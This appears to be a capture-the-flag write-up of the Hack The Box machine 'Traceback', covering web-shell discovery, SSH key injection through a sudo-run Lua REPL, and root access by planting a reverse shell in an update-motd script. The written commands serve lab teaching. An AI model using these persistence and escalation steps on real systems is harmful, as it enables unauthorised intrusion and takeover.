I"EA<blockquote>
  <p><strong>Any actions and or activities related to the material contained within this Website is solely your responsibility. This site contains materials that can be potentially damaging or dangerous. If you do not fully understand something on this site, then GO OUT OF HERE! Refer to the laws in your province/country before accessing, using,or in any other way utilizing these materials.These materials are for educational and research purposes only.</strong></p>
</blockquote>

<h2 id="summary"><strong><span style="color:#ff5555">Summary</span></strong></h2>
<hr />

<ul>
  <li>Searching for web shell</li>
  <li>Reverse shell it as web admin</li>
  <li>Read the .<strong>bash_history</strong> and found that I may run the <code class="language-plaintext highlighter-rouge">luvit</code> with privesc.lua on user</li>
  <li>Run the <code class="language-plaintext highlighter-rouge">luvit script</code> with privesc.lua to get into another <strong>user</strong></li>
  <li>Add my <strong>ssh</strong> public key to <code class="language-plaintext highlighter-rouge">authorized_keys</code></li>
  <li>Execute the <strong>luvit</strong> file</li>
  <li>Put <code class="language-plaintext highlighter-rouge">ssh</code> keys into <strong>/home/sysadmin/.ssh/authorized_keys</strong></li>
  <li>Login as <strong>sysadmin</strong> with <strong>ssh</strong></li>
  <li>Capture <code class="language-plaintext highlighter-rouge">user.txt</code></li>
  <li>Found <code class="language-plaintext highlighter-rouge">update-motd.d</code> with <strong>write</strong> permissiont to all <strong>files</strong></li>
  <li>Modify <code class="language-plaintext highlighter-rouge">/etc/update-motd.d/00-header</code> script with <code class="language-plaintext highlighter-rouge">bash</code> <strong>reverse shell</strong> in order to get <code class="language-plaintext highlighter-rouge">root</code></li>
  <li>Capture <code class="language-plaintext highlighter-rouge">root.txt</code></li>
</ul>

<h2 id="nmap"><strong><span style="color:#ff5555">Nmap</span></strong></h2>
<hr />

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
</pre></td><td class="rouge-code"><pre>root@lordrhovelionz:~/htb/traceback# nmap -sCV -T4 -oA nmap/output traceback.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-12 10:21 WIB
Nmap scan report for traceback.htb (10.10.10.181)
Host is up (0.12s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA)
|   256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA)
|_  256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Help us
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.45 seconds
root@lordrhovelionz:~/htb/traceback# 
</pre></td></tr></tbody></table></code></pre></div></div>

<h2 id="port-80"><strong><span style="color:#ff5555">Port 80</span></strong></h2>
<hr />

<table>
  <tbody>
    <tr>
      <td>![]({{ “/images/htb/traceback/port80.png”</td>
      <td>relative_url }})</td>
    </tr>
  </tbody>
</table>

<p>I ran <code class="language-plaintext highlighter-rouge">Gobuster</code> with <strong>dirbuster</strong> wordlist against it and found nothing <strong>interesting</strong>.</p>

<table>
  <tbody>
    <tr>
      <td>![]({{ “/images/htb/traceback/gobuster1.png”</td>
      <td>relative_url }})</td>
    </tr>
  </tbody>
</table>

<p>Check the page source, there’s actually a <strong>hint</strong>.</p>

<table>
  <tbody>
    <tr>
      <td>![]({{ “/images/htb/traceback/sourcewebpage1.png”</td>
      <td>relative_url }})</td>
    </tr>
  </tbody>
</table>

<p>I decided to search on google with keyword <code class="language-plaintext highlighter-rouge">web shells</code> based on the <strong>source code</strong> and stumbled on this tool called <a href="https://github.com/TheBinitGhimire/Web-Shells">Web-Shells</a></p>

<h2 id="create-a-wordlist"><strong><span style="color:#ff5555">Create a wordlist</span></strong></h2>
<hr />

<p>Copy all of the <strong>php</strong> files into 1 file called <code class="language-plaintext highlighter-rouge">wordlist</code>.</p>

<table>
  <tbody>
    <tr>
      <td>![]({{ “/images/htb/traceback/makewordlist1.png”</td>
      <td>relative_url }})</td>
    </tr>
  </tbody>
</table>

<p>I used <strong>vim</strong> to do this task, and it looks like this.</p>

<table>
  <tbody>
    <tr>
      <td>![]({{ “/images/htb/traceback/wordlist1.png”</td>
      <td>relative_url }})</td>
    </tr>
  </tbody>
</table>

<p>Fuzz it…</p>

<h2 id="fuzzing"><strong><span style="color:#ff5555">Fuzzing</span></strong></h2>
<hr />

<p>Run the scan with <strong>FFUF</strong>.</p>

<table>
  <tbody>
    <tr>
      <td>![]({{ “/images/htb/traceback/ffuf1.png”</td>
      <td>relative_url }})</td>
    </tr>
  </tbody>
</table>

<p>From the result it shows <strong>smevk.php</strong> is the file that I can access from the web page.</p>

<p>The <strong><em>smevk</em></strong>.php is able to execute <strong>command</strong> and see <strong>directory</strong> on the webpage itself.</p>

<table>
  <tbody>
    <tr>
      <td>![]({{ “/images/htb/traceback/smevkpage1.png”</td>
      <td>relative_url }})</td>
    </tr>
  </tbody>
</table>

<h2 id="get-in-as-low-user-privileges"><strong><span style="color:#ff5555">Get in as low user privileges</span></strong></h2>
<hr />

<p>So I send my <strong>ssh</strong> keys <code class="language-plaintext highlighter-rouge">/home/webadmin/.ssh/authorized_keys</code> on the web page.</p>

<p>And I’m in as <code class="language-plaintext highlighter-rouge">webadmin</code>…</p>

<table>
  <tbody>
    <tr>
      <td>![]({{ “/images/htb/traceback/userin.png”</td>
      <td>relative_url }})</td>
    </tr>
  </tbody>
</table>

<p>There is <code class="language-plaintext highlighter-rouge">note.txt</code> in <code class="language-plaintext highlighter-rouge">~</code></p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre></td><td class="rouge-code"><pre>webadmin@traceback:~$ cat note.txt
- sysadmin -
I have left a tool to practice Lua.
I'm sure you know where to find it.
Contact me if you have any question.
webadmin@traceback:~$
</pre></td></tr></tbody></table></code></pre></div></div>

<p>And found something <strong>interesting</strong> which is <code class="language-plaintext highlighter-rouge">.bash_history</code> of the <strong>user</strong>, it looks like this person just execute the <code class="language-plaintext highlighter-rouge">luvit</code> with his own script called <strong>privesc.lua</strong>.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
</pre></td><td class="rouge-code"><pre>webadmin@traceback:~$ cat .bash_history 
ls -la
sudo -l
nano privesc.lua
sudo -u sysadmin /home/sysadmin/luvit privesc.lua 
rm privesc.lua
logout
webadmin@traceback:~$ 
</pre></td></tr></tbody></table></code></pre></div></div>

<p>I decided not to run <code class="language-plaintext highlighter-rouge">linpeas</code> or <code class="language-plaintext highlighter-rouge">pspy</code> because this is seems obvious that I have to escalate to <code class="language-plaintext highlighter-rouge">sysadmin</code> with <strong>luvit</strong></p>

<p>Execute <code class="language-plaintext highlighter-rouge">sudo -l</code> with user <strong>webadmin</strong> also shows that I can run <code class="language-plaintext highlighter-rouge">luvit</code> as <strong>sudo</strong>.</p>

<h2 id="escalation-to-higher-user"><strong><span style="color:#ff5555">Escalation to higher user</span></strong></h2>
<hr />

<table>
  <tbody>
    <tr>
      <td>![]({{ “/images/htb/traceback/sudol.png”</td>
      <td>relative_url }})</td>
    </tr>
  </tbody>
</table>

<p>And I realized that there is another user called <code class="language-plaintext highlighter-rouge">sysadmin</code> which has higher authority than <code class="language-plaintext highlighter-rouge">webadmin</code>.</p>

<table>
  <tbody>
    <tr>
      <td>![]({{ “/images/htb/traceback/2users.png”</td>
      <td>relative_url }})</td>
    </tr>
  </tbody>
</table>

<p>Checking <a href="https://gtfobins.github.io/gtfobins/lua/#shell">GTFOBINS</a>, I found there is a way to get <code class="language-plaintext highlighter-rouge">sysadmin</code>’s shell.</p>

<p>I decided to execute the <code class="language-plaintext highlighter-rouge">luvit</code>, it’s a <code class="language-plaintext highlighter-rouge">lua</code> programming language, and send my <strong>ssh</strong> keys to the user <code class="language-plaintext highlighter-rouge">sysadmin</code>.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre></td><td class="rouge-code"><pre>webadmin@traceback:/home$ sudo -u sysadmin /home/sysadmin/luvit
Welcome to the Luvit repl!
&gt; os.execute("echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDABGR3pWiG1Wz4cE6+XldqXF4yOrqCmbquMv5DvysjYGqUCMbdmr8Gql1gVn3mfiC1jVFWiCkq1BaweneadhLj4DhaJ/hsuSpNN29Pm11UdhrBbfnIJnl9BYb3Z42lt3dAIjPW9EhHc4d+rIrXnPQxuSVx9pV+cj3QhVBQQ9y78fbSXW/82fBLbGgGsmh5jAHE8ZUlMi6xhXMVsDJy3sYkWRPzAaX+/GxqIXGu6JgmZlqtR1QwUYTYhvwQa7Hs+Xj53ayt/YKhl9LCh9xFUwH6YqEnU12+0uEtOn/15y6xfBs4JuRRo05BvOxyLk5PfAHlt/GCk3COWXXoTfrrWEv0hDFR5sSel9xRIoAWXqAYkU2C543NSHu1HrJB3i0L960Ib1DW+WcXvuH9qNZeGpdX1vljTYbKgU1dViu3ACim5YhlQI5sWWe8NH+RqoLuUIQOBhJsXwvK3kZMBOZY8kpUipgMEYm1oyUTbX8wfx1Fj/IByXwO2BLYSlNG+ym8DZc= root@lordrhovelionz' &gt;&gt; /home/sysadmin/.ssh/author
ized_keys")
true    'exit'  0
&gt; 
</pre></td></tr></tbody></table></code></pre></div></div>

<h2 id="capture-usertxt"><strong><span style="color:#ff5555">Capture user.txt</span></strong></h2>
<hr />

<table>
  <tbody>
    <tr>
      <td>![]({{ “/images/htb/traceback/usertxt.png”</td>
      <td>relative_url }})</td>
    </tr>
  </tbody>
</table>

<p>I’m in as <code class="language-plaintext highlighter-rouge">sysadmin</code> now…</p>

<h2 id="escalating-to-root"><strong><span style="color:#ff5555">Escalating to root</span></strong></h2>
<hr />

<p>By running <strong>ps -aux</strong>, found something <strong>interesting</strong>, the copy is made every 30 seconds from the <strong>backup</strong> to the <strong>/update-motd.d</strong> directory as <strong>root</strong></p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td><td class="rouge-code"><pre>$ px -aux
root       1670  0.0  0.0   4628   800 ?        Ss   21:39   0:00 /bin/sh -c sleep 30 ; /bin/cp /var/backups/.update-motd.d/* /etc/update-motd.d/
sysadmin   1731  0.0  0.0  14428  1104 pts/0    S+   21:39   0:00 grep motd
</pre></td></tr></tbody></table></code></pre></div></div>

<p>Also the <strong>/etc/update-motd.d/</strong> does have permission to <strong>write</strong>.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
</pre></td><td class="rouge-code"><pre>$ cd /etc/update-motd.d/
$ ls -la
total 32
drwxr-xr-x  2 root sysadmin 4096 Aug 27  2019 .
drwxr-xr-x 80 root root     4096 Mar 16 03:55 ..
-rwxrwxr-x  1 root sysadmin  981 Aug 11 21:53 00-header
-rwxrwxr-x  1 root sysadmin  982 Aug 11 21:53 10-help-text
-rwxrwxr-x  1 root sysadmin 4264 Aug 11 21:53 50-motd-news
-rwxrwxr-x  1 root sysadmin  604 Aug 11 21:53 80-esm
-rwxrwxr-x  1 root sysadmin  299 Aug 11 21:53 91-release-upgrade
$ 
</pre></td></tr></tbody></table></code></pre></div></div>

<h2 id="reverse-shell"><strong><span style="color:#ff5555">Reverse Shell</span></strong></h2>
<hr />

<p>All of the files have <strong>write</strong> permission, so I choose to edit <strong>00-header</strong>.</p>

<table>
  <tbody>
    <tr>
      <td>![]({{ “/images/htb/traceback/defaultheader00.png”</td>
      <td>relative_url }})</td>
    </tr>
  </tbody>
</table>

<p>This is the default file from <strong>/etc/update-motd.d/</strong> which I’m going to put my <strong>reverse shell</strong> inside the file and listen with <strong>netcat</strong>.</p>

<table>
  <tbody>
    <tr>
      <td>![]({{ “/images/htb/traceback/editedscript.png”</td>
      <td>relative_url }})</td>
    </tr>
  </tbody>
</table>

<p>And this is the <strong>file</strong> that I put my <strong>reverse shell</strong> which will give me <strong>root</strong> to the machine.</p>

<p>Send <strong>nc</strong> to the <strong>sysadmin</strong> on <code class="language-plaintext highlighter-rouge">/tmp</code> directory with <strong>scp</strong>.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
</pre></td><td class="rouge-code"><pre>root@lordrhovelionz:~/htb/traceback# l
total 56K
drwxr-xr-x 5 root root 4.0K Aug 12 11:18 .
drwxr-xr-x 6 root root 4.0K Aug 12 10:08 ..
drwxr-xr-x 2 root root 4.0K Aug 12 10:19 exploit
-rwxr-xr-x 1 root root  35K Aug 12 11:18 nc
drwxr-xr-x 2 root root 4.0K Aug 12 10:20 nmap
drwxr-xr-x 3 root root 4.0K Aug 12 11:07 Web-Shells
root@lordrhovelionz:~/htb/traceback# scp -i ~/.ssh/id_rsa nc sysadmin@traceback.htb:/tmp
################################
-------- OWNED BY XH4H  ---------
- I guess stuff could have been configured better ^^ -
#################################
nc
</pre></td></tr></tbody></table></code></pre></div></div>

<p>Quick check the <strong>NC</strong> is on <code class="language-plaintext highlighter-rouge">/tmp</code></p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
</pre></td><td class="rouge-code"><pre>$ ls -la
total 84
drwxrwxrwt 12 root     root      4096 Aug 11 21:47 .
drwxr-xr-x 22 root     root      4096 Aug 25  2019 ..
drwxrwxrwt  2 root     root      4096 Aug 11 21:17 .font-unix
drwxrwxrwt  2 root     root      4096 Aug 11 21:17 .ICE-unix
-rwxr-xr-x  1 sysadmin sysadmin 35520 Aug 11 21:47 nc
drwx------  3 root     root      4096 Aug 11 21:17 systemd-private-61e7854a51734d09a1af240f2815b85a-apache2.service-Ivbqkb
drwx------  3 root     root      4096 Aug 11 21:17 systemd-private-61e7854a51734d09a1af240f2815b85a-systemd-resolved.service-XUcyXs
drwx------  3 root     root      4096 Aug 11 21:17 systemd-private-61e7854a51734d09a1af240f2815b85a-systemd-timesyncd.service-Au30ij
drwxrwxrwt  2 root     root      4096 Aug 11 21:17 .Test-unix
drwxrwxrwt  2 root     root      4096 Aug 11 21:17 VMwareDnD
drwx------  2 root     root      4096 Aug 11 21:31 vmware-root_411-1816005628
drwxrwxrwt  2 root     root      4096 Aug 11 21:17 .X11-unix
drwxrwxrwt  2 root     root      4096 Aug 11 21:17 .XIM-unix
$ 
</pre></td></tr></tbody></table></code></pre></div></div>

<p>Also fire the listener with <strong>netcat</strong>.</p>

<p>Now I just need to exit from the <strong>user</strong> and login back with <strong>ssh</strong> and the script will be automatically executed because of the <strong>bash reverse shell</strong> that I put on <code class="language-plaintext highlighter-rouge">/etc/update-motd.d/00-header</code> will trigger it and give me the <strong>root</strong> shell.</p>

<table>
  <tbody>
    <tr>
      <td>![]({{ “/images/htb/traceback/roottxt.png”</td>
      <td>relative_url }})</td>
    </tr>
  </tbody>
</table>

<hr />

<table>
  <tbody>
    <tr>
      <td>![]({{ “/images/mandatory/pwned.png”</td>
      <td>relative_url }})</td>
    </tr>
  </tbody>
</table>
:ET